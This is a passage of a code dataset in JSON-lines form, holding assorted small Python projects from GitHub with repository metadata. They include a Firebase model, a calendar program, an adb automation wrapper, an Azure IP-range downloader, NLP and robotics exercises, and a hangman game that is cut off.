dict):\n \"Update a post document\"\n data['preview'] = self.get_preview()\n self.doc.update(data)\n return self.doc.get()\n\n def delete(self):\n \"Delete a post document\"\n self.doc.delete()\n return self\n\n def save(self, uid: str):\n \"Save a post document\"\n doc = (\n db.collection(\"user_posts\")\n .document(uid)\n .collection(\"saved\")\n .document(self.doc.id)\n )\n doc.set({\"id\": self.doc.id})\n return self\n\n def unsave(self, uid: str):\n \"Save a post document\"\n doc = (\n db.collection(\"user_posts\")\n .document(uid)\n .collection(\"saved\")\n .document(self.doc.id)\n )\n doc.delete()\n return self\n\n def get_link(self):\n return f\"/posts/{self.doc.id}\"\n\n @staticmethod\n def preview_url(post_id: str):\n return f\"https://firebasestorage.googleapis.com/v0/b/codeblocks-991a2.appspot.com/o/{post_id}.png?alt=media\"\n\n def get_preview(self):\n return Post.preview_url(self.doc.id)\n","repo_name":"adrian2x/codeblocks","sub_path":"server/models/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28849682804","text":"N = int(input())\nA = list(map(int, input().split()))\nQ = int(input())\nB = []\nfor _ in range(Q):\n B.append(list(map(int, input().split())))\n\n\nd = [0]*(10**5+1)\nans = 0\nfor i in range(N):\n d[A[i]] += 1\n ans += A[i]\n\nfor j in range(Q):\n ans = ans - d[B[j][0]]*B[j][0] + d[B[j][0]]*B[j][1]\n d[B[j][1]] += d[B[j][0]]\n d[B[j][0]] = 0\n print(ans)\n","repo_name":"kentahoriuchi/Atcorder","sub_path":"ABC171/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13880984044","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport gzip \nimport math\nimport sys\nimport time\nimport datetime\nimport string\nimport re\nimport operator\nimport pickle\nimport os\nimport math\nimport csv\nimport numpy as np\nimport cPickle\nfrom collections import defaultdict\nfrom nltk.tokenize import word_tokenize\nimport sys, re, os\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport random\n#import cPickle\nreload(sys) #python2.7\n#from imp import reload#python3.0\n# this code used to generate a dict which instore the documents by sentence and sentence from the big dict key is docno and value is the whole text\n\ndef saveObjToFile(FileName,obj):\n\tfw = open(FileName,\"wb\")\n\tpickle.dump(obj,fw,protocol=2)\n\tfw.close()\n\n\ndef get_S(stopwords_file):\n\tList = []\n\tSFile = open(stopwords_file,\"rb\")\n\tLines = SFile.readlines()\n\t#print Lines\n\tfor line in Lines:\n\t\t#print line\n\t\t#print line.strip()\n\t\tList.append(line.strip())\n\treturn List\n\ndef add_unknown_words(word_vecs, vocab, min_df=1, k=300):\n\tfor word in vocab:\n\t\tif word not in word_vecs and vocab[word] >= min_df:\n\t\t\tword_vecs[word] = np.random.uniform(-0.25,0.25,k) \n\ndef clean_str(string, TREC=False):\n\tstring = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", string) \n\tstring = re.sub(r\"\\'s\", \" \\'s\", string) \n\tstring = re.sub(r\"\\'ve\", \" \\'ve\", string) \n\tstring = re.sub(r\"n\\'t\", \" n\\'t\", string) \n\tstring = re.sub(r\"\\'re\", \" \\'re\", string) \n\tstring = re.sub(r\"\\'d\", \" \\'d\", string) \n\tstring = re.sub(r\"\\'ll\", \" \\'ll\", string) \n\t#string = re.sub(r\",\", \" , \", string) \n\tstring = re.sub(r\"!\", \" ! \", string) \n\tstring = re.sub(r\"\\(\", \" \\( \", string) \n\tstring = re.sub(r\"\\)\", \" \\) \", string) \n\tstring = re.sub(r\"\\?\", \" \\? \", string)\n\tstring = re.sub(r\"\\*\", \" \\* \", string) \n\tstring = re.sub(r\"\\s{2,}\", \" \", string) \n\treturn string.strip() if TREC else string.strip().lower()\n\ndef clean_str_sst(string):\n\tstring = re.sub(r\"[^A-Za-z0-9().,!?\\'\\`]\", \" \", string) \n\tstring = re.sub(r\"\\s{2,}\", \" \", string) \n\treturn string.strip().lower()\n\n\ndef exer(clean_string=True):\n\tstopwords_file = \"/home/echo/Documents/word2vec/CNN_keras_demo/stopword-list.txt\"\n\tSList = get_S(stopwords_file)\n\tfilepath = \"/home/echo/Documents/WT2G/WT01/DOCs_TEXT_Dict\"\n\tDict = pickle.load(open(filepath,\"rb\"))\n\tcount = 0\n\tvocab = defaultdict(float)\n\tfor key,value in Dict.items():\n\t\tcount = count +1\n\t\tif (count<3):\n\t\t\t#print key\n\t\t\tcnt = 0\n\t\t\tfor line ,sent in value.items():\n\t\t\t\trev = []\n\t\t\t\trev.append(sent.strip())\n\t\t\t\tif clean_string:\n\t\t\t\t\torig_rev = clean_str(\" \".join(rev))\n\t\t\t\telse:\n\t\t\t\t\torig_rev = \" \".join(rev).lower()\n\t\t\t\torig_rev_list= orig_rev.split()\n\t\t\t\tnew_list = [w for w in orig_rev_list if not w in SList]\n\t\t\t\torig_rev_new =\" \".join(new_list)\n\t\t\t\twords = set(orig_rev_new.split())\n\t\t\t\tfor word in words:\n\t\t\t\t\tvocab[word] += 1\n\t\t\t\tdatum = {\"y\":1,\"docname\":key,\"line_num\":line, \"text\": orig_rev_new, \"num_words\": len(orig_rev_new.split())}\n\n\t\n\t\n\t\n\t\n\t\nif __name__ == \"__main__\":\n\tFilepath = \"/home/echo/Documents/word2vec/CNN_keras_demo/query_docs/\"\n\t'''DocsDict= pickle.load(open(\"/home/echo/Documents/word2vec/CNN_keras_demo/DocsDict\",\"rb\"))\n\t#key is target docnos(WT02-B33-20_1) not whole docno of corpus ,value is dict (key is word,value is tf og word)\n\tDocsLen= pickle.load(open(\"/home/echo/Documents/word2vec/CNN_keras_demo/DocsLen\",\"rb\"))\n\t#key is docno:\"WT01-B11-196\",value is the length of docno without stopwords and repeated words but not stemmed\n\tDocFrqDict = pickle.load(open(\"/home/echo/Documents/WT2G/Sentence/WordTDF_Dict\",\"rb\"))\n\t#key is word,value is number of docments which words appeared\n\tnumberOfDocuments = len(DocsLen)\n\taverageDocumentLength = sum(DocsLen.values())/len(DocsLen)#'''\n\t#Score_Window(FilePath,DocsDict,DocsLen,DocFrqDict,numberOfDocuments,averageDocumentLength)\n\t#exer()\n\t#Score_WindowN(Filepath)\n\texer(clean_string=True)\n\t\n","repo_name":"YuanyuanQi/Python_W2V_WT2G","sub_path":"GetSents_all_wt2g.py","file_name":"GetSents_all_wt2g.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27966179207","text":"#=========================================\n#Roosevelt Bannerman\n#Fundamental Programming in Bioinformatics\n#Calendar\n#=========================================\n\nglobal months, weekdays,days, nullString, dashString, NUM_MONTHS,NUM_WEEKDAYS\n\nmonths = (\"January\",\"Feburary\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\",\"November\",\"December\")\nweekdays = (\"Su\",\"Mo\",\"Tu\",\"We\",\"Th\",\"Fr\",\"Sa\")\ndays = [31,28,31,30,31,30,31,31,30,31,30,31]\nnullString = \"\\0\" * 28\ndashString = '-' * 28\nNUM_MONTHS = 12\nNUM_WEEKDAYS = 7\n\n#=========================================\n#Obtains the year from the user\n#Returns the year\n#=========================================\ndef obtainYear():\n isValid = False\n while(not isValid):\n print(\"\\n\\tPlease enter a year from 1900 to 2016 : \", end='')\n year = input()\n isValid = True\n if(not year.isdigit()):\n isValid = False\n continue\n year = int(year)\n if(year < 1900 or year > 2016):\n isValid = False\n \n return year\n\n#=========================================\n#Recieves the entered year\n#Returns whether the year is a leap year\n#=========================================\ndef isLeap(year):\n if(year % 4 == 0):\n if(year % 100 == 0):\n if(year % 400 == 0):\n return True\n return False\n return True\n return False\n\n#=========================================\n#Recieves the entered year\n#Calculates the number of leap years since 1900\n#Returns the number of leap years\n#=========================================\ndef calculateLeaps(year):\n totalLeaps = 0\n\n for i in range(1900,year):\n if(i % 4 == 0):\n if(i % 100 == 0):\n if(i % 400 == 0):\n totalLeaps += 1\n continue\n totalLeaps += 1\n continue;\n return totalLeaps\n\n#=========================================\n#Recieves the entered year and the total number of leap years\n#Calculates the first day of the entered year\n#Returns the integer for the first day of the entered year\n#=========================================\ndef calculateDayOne(year,leaps):\n\n difference = year - 1900\n days = (difference * 365) + leaps\n \n return(days % NUM_WEEKDAYS)\n\n#=========================================\n#Recieves the entered year and the first day of the year\n#Displays the calendar for the entered year\n#=========================================\ndef displayResults(year,start):\n counter = start + 1\n if(counter == NUM_WEEKDAYS):\n counter = 0\n\n for currentMonth in range(12):\n spacing = int(((23 - len(months[currentMonth]))/2)) * ' '\n print(\"\\n\" + spacing + months[currentMonth] + \" \" + str(year))\n\n for day in weekdays:\n print(\" \" + day,end='')\n \n print(\"\\n\" + dashString)\n\n start = (0 + (4*counter)) * ' '\n print(start,end='')\n \n for currentDay in range(1,days[currentMonth]+1):\n if(currentDay > 9):\n print(\" \" + str(currentDay),end='')\n counter += 1\n if(counter == NUM_WEEKDAYS):\n if(currentDay != days[currentMonth]):\n print()\n counter = 0\n else:\n print(\" \" + str(currentDay),end='')\n counter += 1\n if(counter == NUM_WEEKDAYS):\n if(currentDay != days[currentMonth]):\n print()\n counter = 0\n print() \n print() \n \n\n \n#=========================================\n#Executes the Program\n#=========================================\ndef runProgram():\n year = obtainYear()\n if(isLeap(year)):\n days[1] = 29\n totalLeaps = calculateLeaps(year)\n dayOne = calculateDayOne(year,totalLeaps)\n displayResults(year,dayOne)\n stop = input()\n\nrunProgram()\n\n\n\n\n\n\n\n","repo_name":"HarrisonBannerman/Calendar_Program","sub_path":"Calendar.py","file_name":"Calendar.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31368453457","text":"\"\"\"\n@author '彼时思默'\n@time 2019/12/7 13:16\n@describe:\n 通过adb.exe操纵Android\n\"\"\"\nimport subprocess\n\nfrom config import tap\nfrom loguru import logger\n\n\nclass AdbNio:\n def __init__(self):\n cmd = 'adb devices'\n statue = self._exe(cmd)\n if 'cannot connect to' in statue:\n cmd = f'adb connect 127.0.0.1:7555'\n self._exe(cmd)\n\n def _exe(self, cmd):\n logger.debug(cmd)\n connect = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE,\n shell=True)\n if 'screencap' in cmd:\n return connect.stdout.read()\n stdout = connect.stdout.read().decode('utf8')\n # if stdout != '':\n # logger.debug(stdout)\n return stdout\n\n def run_app(self, name='com.cig.themonsterchef'):\n # com.cig.themonsterchef\n cmd = f'adb shell am start -n {name}'\n self._exe(cmd)\n\n def shot_screen(self):\n cmd = f'adb shell screencap -p'\n out_origin = self._exe(cmd)\n out = out_origin.replace(b'\\r\\n', b'\\n')\n # with open(f'{root}/temp/sc.png', 'wb')as file:\n # file.write(out)\n return out\n\n\n def tap(self, x, y):\n cmd = f'adb shell input tap {x} {y}'\n self._exe(cmd)\n\n def swipe(self, start_x, start_y, end_x, end_y, delay=500):\n cmd = f'adb shell input swipe {start_x} {start_y} {end_x} {end_y} {delay}'\n self._exe(cmd)\n\n def tap_long(self, start_x, start_y, delay=500):\n cmd = f'adb shell input swipe {start_x} {start_y} {start_x} {start_y} {delay}'\n self._exe(cmd)\n\n\nadb = AdbNio()\n\nif __name__ == '__main__':\n # pic = adb.shot_screen()\n # with open('../temp/sc.png', 'wb')as file:\n # file.write(pic)\n # adb.tap(450, 313)\n # adb.tap_long(*tap.XY_close_video_58, 1000)\n adb.tap(*tap.XY_close_video_58)\n","repo_name":"bishisimo/game_helper","sub_path":"utils/adb.py","file_name":"adb.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41018933372","text":"import torch\nimport torch.nn\nimport torch.nn.functional as F\nimport numpy\n\nfrom typing import Optional, Dict\nfrom overrides import overrides\n\nfrom allennlp.common import Params\nfrom allennlp.common.checks import ConfigurationError\nfrom allennlp.data import Vocabulary\nfrom allennlp.modules import FeedForward, Seq2VecEncoder, TextFieldEmbedder\nfrom allennlp.models.model import Model\nfrom allennlp.nn import InitializerApplicator, RegularizerApplicator\nfrom allennlp.nn import util\nfrom allennlp.training.metrics import CategoricalAccuracy, F1Measure\n\n\n@Model.register(\"dialogue_context_coherence_classifier\")\nclass DialogueContextCoherenceClassifier(Model):\n\n def __init__(self,\n vocab: Vocabulary,\n text_field_embedder: TextFieldEmbedder,\n context_encoder: Seq2VecEncoder,\n response_encoder: Seq2VecEncoder,\n classifier_feedforward: FeedForward,\n initializer: InitializerApplicator = InitializerApplicator(),\n regularizer: Optional[RegularizerApplicator] = None) -> None:\n super(DialogueContextCoherenceClassifier, self).__init__(vocab, regularizer)\n\n self.text_field_embedder = text_field_embedder\n self.num_classes = vocab.get_vocab_size(\"labels\")\n self.context_encoder = context_encoder\n self.response_encoder = response_encoder\n self.classifier_feedforward = classifier_feedforward\n labels = self.vocab.get_index_to_token_vocabulary('labels')\n pos_label_index = list(labels.keys())[list(labels.values()).index('neg')]\n self.metrics = {\n \"accuracy\": CategoricalAccuracy()\n # \"f1\": F1Measure(positive_label=pos_label_index)\n }\n self.loss = torch.nn.CrossEntropyLoss()\n initializer(self)\n\n @overrides\n def forward(self,\n context: Dict[str, torch.LongTensor],\n response: Dict[str, torch.LongTensor],\n label: torch.LongTensor = None) -> Dict[str, torch.Tensor]:\n embedded_context = self.text_field_embedder(context)\n encoded_context = self.context_encoder(\n embedded_context,\n util.get_text_field_mask(context))\n\n encoded_response = self.response_encoder(\n self.text_field_embedder(response),\n util.get_text_field_mask(response))\n\n logits = self.classifier_feedforward(torch.cat([encoded_context, encoded_response], dim=-1))\n\n class_probs = F.softmax(logits, dim=-1)\n\n output_dict = {\"class_probabilities\": class_probs}\n\n if label is not None:\n loss = self.loss(logits, label.squeeze(-1))\n for metric in self.metrics.values():\n metric(logits, label.squeeze(-1))\n output_dict['loss'] = loss\n\n return output_dict\n\n @overrides\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n # precision, recall, f1 = self.metrics[\"f1\"].get_metric(reset)\n # metrics = {\"accuracy\": self.metrics[\"accuracy\"].get_metric(reset),\n # \"precision:\": precision,\n # \"recall\": recall,\n # \"f1\": f1}\n # return metrics\n return {metric_name: metric.get_metric(reset) for metric_name, metric in self.metrics.items()}\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n predictions = output_dict[\"class_probabilities\"].cpu().data.numpy()\n argmax_indices = numpy.argmax(predictions, axis=-1)\n labels = [self.vocab.get_token_from_index(x, namespace=\"labels\") for x in argmax_indices]\n output_dict['label'] = labels\n return output_dict\n\n @classmethod\n def from_params(cls, vocab: Vocabulary, params: Params) -> 'DialogueContextCoherenceClassifier':\n embedder_params = params.pop(\"text_field_embedder\")\n text_field_embedder = TextFieldEmbedder.from_params(vocab, embedder_params)\n context_encoder = Seq2VecEncoder.from_params(params.pop(\"context_encoder\"))\n response_encoder = Seq2VecEncoder.from_params(params.pop(\"response_encoder\"))\n classifier_feedforward = FeedForward.from_params(params.pop(\"classifier_feedforward\"))\n\n initializer = InitializerApplicator.from_params(params.pop(\"initializer\", []))\n regularizer = RegularizerApplicator.from_params(params.pop(\"regularizer\", []))\n\n return cls(vocab=vocab,\n text_field_embedder=text_field_embedder,\n context_encoder=context_encoder,\n response_encoder=response_encoder,\n classifier_feedforward=classifier_feedforward,\n initializer=initializer,\n regularizer=regularizer)\n","repo_name":"XinnuoXu/DRank","sub_path":"supervised_learning/discriminator/coherence/models/dialogue_context_coherence_classifier.py","file_name":"dialogue_context_coherence_classifier.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43709939425","text":"\"\"\"\r\n#判断基数偶数\r\n\r\n输入说明:\r\n输入一个整数\r\n输出说明:\r\n输出奇数或偶数\r\n输入范例:\r\n3\r\n输出范例:\r\nodd\r\n输入范例:\r\n6\r\n输出范例:\r\neven\r\n\"\"\"\r\na=int(input())\r\n\r\nif a%2==0:\r\n print(\"even\")\r\nelse:\r\n print(\"odd\")","repo_name":"Andersonabc/practice_Python","sub_path":"week1-4.py","file_name":"week1-4.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42121330337","text":"from relsad.examples.tutorial.system_components import *\n\nfrom relsad.network.systems import (\n PowerSystem,\n Transmission,\n Distribution,\n)\n\nfrom relsad.load.bus import CostFunction\n\nfrom relsad.visualization.plotting import plot_topology\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nload_household = np.ones(365 * 24) * 0.05 # MW\n\nhousehold = CostFunction(\n A=8.8,\n B=14.7,\n)\n\nB2.add_load_data(\n pload_data=load_household,\n cost_function=household,\n)\n\nB3.add_load_data(\n pload_data=load_household,\n cost_function=household,\n)\n\n\nps = PowerSystem(controller=C1)\n\ntn = Transmission(\n parent_network=ps,\n trafo_bus=B1,\n)\n\ndn = Distribution(\n parent_network=tn,\n connected_line=L1,\n)\ndn.add_buses([B2, B3, B4, B5, B6])\ndn.add_lines([L2, L3, L4, L5, L6])\n\nfig = plot_topology(\n buses=ps.buses,\n lines=ps.lines,\n bus_text=True,\n line_text=True,\n)\n\nfig.savefig(\n \"test_network.png\",\n dpi=600,\n)\nos.remove(\"test_network.png\")\n","repo_name":"stinefm/relsad","sub_path":"relsad/examples/tutorial/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"24931700585","text":"#!/usr/bin/python3\n\nimport requests,json,re\n\nprint(\"[+] Azure ip range downloader\")\n\ndef request_wrapper(url, headers={}):\n\n for i in range(1,4):\n r=requests.get(url,headers=headers)\n if r.status_code==200:\n print(\"[+] Got %s successfully!\"%(url))\n break\n if i==3:\n print(\"[!] Failed to get %s.\"%(url))\n exit(2)\n print(\"[!] Getting %s failed(%i/3)\"%(url,i))\n\n return r.text\n\nua_dict=json.loads(request_wrapper(\"https://www.useragents.me/api\"))\n\nbest_ua = ua_dict[\"data\"][0]['ua']\n\ncontents=request_wrapper(\"https://www.microsoft.com/en-us/download/details.aspx?id=56519\",headers={\"User-Agent\":best_ua})\n\ndownload_url=re.findall(r\"https:\\/\\/download.microsoft.com\\/download\\/.*?\\.json\",contents)[0]\n\nazure_ips=json.loads(request_wrapper(download_url))['values']\n\nazure_ipv4=[]\nazure_ipv6=[]\n\nfor i in azure_ips:\n for j in i[\"properties\"][\"addressPrefixes\"]:\n if \".\" in j:\n azure_ipv4.append(j)\n if \":\" in j:\n azure_ipv6.append(j)\n\nazure_ipv4=list(dict.fromkeys(azure_ipv4))\nazure_ipv6=list(dict.fromkeys(azure_ipv6))\n\nif len(azure_ipv4) > 0:\n content=\"\\n\".join(azure_ipv4)\n open(\"sources/ips/azure-ips-ipv4.txt\",'w').write(content)\n\nif len(azure_ipv6) > 0:\n content=\"\\n\".join(azure_ipv6)\n open(\"sources/ips/azure-ips-ipv6.txt\",'w').write(content)\n","repo_name":"molangning/fire-av","sub_path":"scripts/get-azure-ranges.py","file_name":"get-azure-ranges.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6405659824","text":"from unccalumni.web.dash.Basic import Basic\nfrom unccalumni.plotting_constants import THEME ,ColorPalette\nfrom unccalumni.utils import DataFrameService\n\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nfrom plotnine import *\n\nimport logging\nimport pandas as pd\nimport numpy as np\nimport random\nimport json\nimport geopandas\nimport pdb\n\n\nlogging.basicConfig(level = logging.INFO)\n\nclass Scores(Basic):\n \"\"\"\n Creates the Test Scores Dashboard.\n It inherits the `Basic` class and overrides `_filteredDf` and `_chart` methods\n \"\"\"\n class HTML_IDS:\n SCORE_DROPDOWN = \"score_dropdown\"\n\n def __init__(self,route,flaskApp):\n self.score_columns = DataFrameService().get_score_columns()\n super().__init__(route,flaskApp , \"Scores\")\n\n def filteredDf(self,checklist , year_checklist , program_checklist , scores_column):\n return super().filteredDf(checklist , year_checklist , program_checklist )\n\n def chart(self,dfs,checklist,year_checklist , program_checklist,scores_column):\n print(scores_column)\n if dfs is None:\n return self.getErrorPlot(self.ERROR_MSG)\n\n df , geo_df = dfs\n\n score_df = df\n p = (\n ggplot(score_df[~score_df[scores_column].isna()] , aes(x=scores_column, fill=\"APP_FINAL_DECISION\") )\n + geom_density(alpha=0.5)\n + geom_vline(score_df.groupby([\"APP_FINAL_DECISION\"])[scores_column].mean().reset_index(name=\"mean_score\")\n , aes(xintercept = \"mean_score\" ,color=\"APP_FINAL_DECISION\"))\n + scale_x_continuous(limits=(score_df[scores_column].quantile(0.01),score_df[scores_column].quantile(.95)))\n + scale_fill_manual(values= ColorPalette.mapRandomColors(score_df[\"APP_FINAL_DECISION\"]))\n + scale_color_manual(values= ColorPalette.mapRandomColors(score_df[\"APP_FINAL_DECISION\"]))\n + theme_bw()\n + theme(figure_size=(15,5) , panel_border=element_blank())\n + ggtitle(scores_column)\n + ylab(\" \")\n + annotate(\"text\" , x=168 , y= 0.1 , label=\"Mean Lines\")\n )\n return [p]\n\n def makePlotImgsLayout(self, imgs):\n return html.Div(className=\"dash-container container p-0 m-0\", children=[\n html.Div(className=\"row\" ,children=[\n html.Div(className=\"col-md-12\" , children = [imgs[0]])\n ])\n # ,\n # html.Div(className=\"row\" ,children=[\n # html.Div(className=\"col-md-12\" , children = [imgs[1]])\n # ])\n\n ])\n\n def setupCallBacks(self):\n @self.app.callback(\n Output(component_id=Basic.HTML_IDS.IMG, component_property='children'),\n [Input(component_id=Basic.HTML_IDS.CHECKLIST, component_property='value')\n ,Input(component_id=Basic.HTML_IDS.YEAR_CHECKLIST, component_property='value')\n ,Input(component_id=Basic.HTML_IDS.PROGRAM_CHECKLIST, component_property='value')\n ,Input(component_id=Scores.HTML_IDS.SCORE_DROPDOWN, component_property='value')]\n )\n def filter_based_on_checklist_callback(checklist , year_checklist ,program_checklist , scores_column):\n return self.filter_based_on_checklist(checklist = checklist\n , year_checklist =year_checklist\n ,program_checklist=program_checklist\n , scores_column=scores_column)\n\n def makeInputLayout(self):\n parentInputs = super().makeInputLayout()\n return html.Div(className=\"row\", children=[\n html.Div(className=\"col-md-12\" ,children=[\n html.Div(className=\"fluid-row\", children=[\n dcc.Dropdown(id=Scores.HTML_IDS.SCORE_DROPDOWN ,\n options=[{\"label\" : v , \"value\" : v} for v in self.score_columns],\n value=self.score_columns[0])\n ]),\n parentInputs\n ])\n ])\n","repo_name":"abhijeetdtu/unccalumni","sub_path":"unccalumni/web/dash/Scores.py","file_name":"Scores.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70014922612","text":"#!/usr/bin python3\r\n\r\nfrom abc import ABC, abstractmethod\r\nimport pathlib\r\nimport shutil\r\nimport os\r\n\r\nimport casadi as ca\r\n\r\nfrom barcgp.dynamics.models.model_types import ModelConfig\r\n\r\nclass AbstractModel(ABC):\r\n '''\r\n Base class for models\r\n Controllers may differ widely in terms of algorithm runtime and setup however\r\n for interchangeability controllers should implement a set of standard runtime methods:\r\n '''\r\n def __init__(self, model_config: ModelConfig):\r\n self.model_config = model_config\r\n \r\n if not model_config.enable_jacobians:\r\n jac_opts = dict(enable_fd=False, enable_jacobian=False, enable_forward=False, enable_reverse=False)\r\n else:\r\n jac_opts = dict()\r\n self.options = lambda fn_name: dict(jit=False, **jac_opts)\r\n\r\n @abstractmethod\r\n def step(self):\r\n pass\r\n\r\n # Method for installing generated files\r\n def install(self, dest_dir: str=None, src_dir: str=None, verbose=False):\r\n # If no target directory is provided, try to install a directory with\r\n # the same name as the model name in the current directory\r\n if src_dir is None:\r\n src_path = pathlib.Path.cwd().joinpath(self.model_config.model_name)\r\n else:\r\n src_path = pathlib.Path(src_dir).expanduser()\r\n\r\n if dest_dir is None:\r\n if self.model_config.install_dir is None:\r\n if verbose:\r\n print('- No destination directory provided, did not install')\r\n return None\r\n dest_path = pathlib.Path(self.model_config.install_dir).expanduser()\r\n else:\r\n dest_path = pathlib.Path(dest_dir).expanduser()\r\n\r\n if src_path.exists():\r\n if not dest_path.exists():\r\n dest_path.mkdir(parents=True)\r\n # If directory with same name as model already exists, delete\r\n if dest_path.joinpath(self.model_config.model_name).exists():\r\n if verbose:\r\n print('- Existing installation found, removing...')\r\n shutil.rmtree(dest_path.joinpath(self.model_config.model_name))\r\n shutil.move(str(src_path), str(dest_path))\r\n if verbose:\r\n print('- Installed files from source: %s to destination: %s' % (str(src_path), str(dest_path.joinpath(self.model_config.model_name))))\r\n return dest_path.joinpath(self.model_config.model_name)\r\n else:\r\n if verbose:\r\n print('- The source directory %s does not exist, did not install' % str(src_path))\r\n return None\r\n","repo_name":"MPC-Berkeley/gp-opponent-prediction-models","sub_path":"barcgp/dynamics/models/abstract_model.py","file_name":"abstract_model.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"36517554619","text":"import mq_messaging as mq\nimport random\nimport time\nimport sys\n\n\ndef main(task_channel):\n q = mq.TaskPublisher('localhost')\n while True:\n try:\n n = random.randint(1, 1000)\n print('Publishing %s with value %i' % (task_channel, n))\n q.publish_task(task_channel, str(n), timeout=10)\n time.sleep(random.random())\n except KeyboardInterrupt:\n break\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print('Please supply a task channel name.')\n sys.exit(1)\n main(sys.argv[1])\n sys.exit(0)\n","repo_name":"mjbankston/UberProject","sub_path":"Python/test_mq_messaging/repeated_task_publisher.py","file_name":"repeated_task_publisher.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8486347927","text":"from matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\n#字符串的比较函数,两个字符串相同返回1,不同返回值为0\r\ndef cmp(str1,str2):\r\n if(str1==str2):\r\n return 1\r\n else:\r\n return 0\r\n\r\n#二维数组的索引函数,功能:在q矩阵中找到元素w的位置,并作为返回值返回\r\ndef index_arr(q,w):\r\n nCol = np.size(q,1)\r\n q_max = np.max(q)\r\n v = q.flatten()\r\n n = v.tolist()\r\n a = n.index(w)\r\n i = int(math.modf(a/nCol)[1]) + 1\r\n j = a%(nCol) + 1\r\n return i,j\r\n\r\n#模拟机器人在一次运动过程中对其位置判决的概率分析\r\ndef sense(p,z,world,pSenseCorrect):\r\n nRow = np.size(p,0)\r\n nCol = np.size(p,1)\r\n q = np.zeros((nRow,nCol))\r\n for i in range(nRow):\r\n for j in range(nCol):\r\n hit = cmp(z,(world[i][j]))\r\n q[i][j]=p[i][j]*(hit * pSenseCorrect + (1-hit) * (1 - pSenseCorrect))\r\n q_sum = np.sum(q)\r\n q = q / q_sum\r\n return q\r\n\r\nworld = np.array([('red', 'green', 'green', 'red', 'red'),\r\n ('red', 'red', 'green', 'red', 'red'),\r\n ('red', 'red', 'green', 'green', 'red'),\r\n ('red', 'red', 'red', 'red', 'red')])\r\nnCol = np.size(world,1)#列数,此处与matlab对应的代码有所不同\r\nnRow = np.size(world,0)#行数,此处与matlab对应的代码有所不同\r\npSenseCorrect = 0.7\r\npStart = 0.7\r\np = np.ones((nRow,nCol))\r\np = (1 - pStart) / (nRow * nCol - 1) * p\r\np[2][1] = pStart\r\nprint('The Prior:')\r\nprint(p)\r\nmeasurements = np.array(['green'])\r\nq = sense(p,measurements[0],world,pSenseCorrect)\r\nprint('The probability after sensing:')\r\nprint(q)\r\nq_max = np.max(q)\r\nstr1 = 'The largest probability '+str(q_max)\r\nstr2 = 'occurs at cell'+str(index_arr(q,q_max))\r\nprint(str1,str2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"liyaochong/Mobile-Robot-Foundation","sub_path":"p10.py","file_name":"p10.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42543776185","text":"import random\r\nwords=('κιθαρα','τραπεζι','παπουτσι', 'αγγουρι', 'ρολοι', 'κουπα', 'οπτασια', 'οθονη', 'χιονι',\r\n'πατατα', 'ραδιο', 'οπλο', 'μπαλα', 'μπορα' , 'αγκυρα', 'πλοιο', 'μανικι', 'παλουκι','τσιχλα',\r\n'ριζα','ρυζι','κρικος','οραμα','λαμψη', 'αστρο','ουρανος')\r\n\r\ndef kremmala():\r\n leksi=random.choice(words)\r\n grammata=[]\r\n lathi=0\r\n print(f'Λέξη με {len(leksi)} γράμματα')\r\n print_leksi(leksi,grammata)\r\n \r\n while lathi<5 and (not leksi_in_grammata(leksi,grammata)):\r\n gramma = input (\"Δώσε γράμμα : \")\r\n if gramma not in grammata:\r\n grammata.append(gramma)\r\n if gramma not in leksi:\r\n lathi+=1\r\n print(f\"Έχεις {lathi} από 5 λάθη\")\r\n else:\r\n print_leksi(leksi,grammata)\r\n else: \r\n 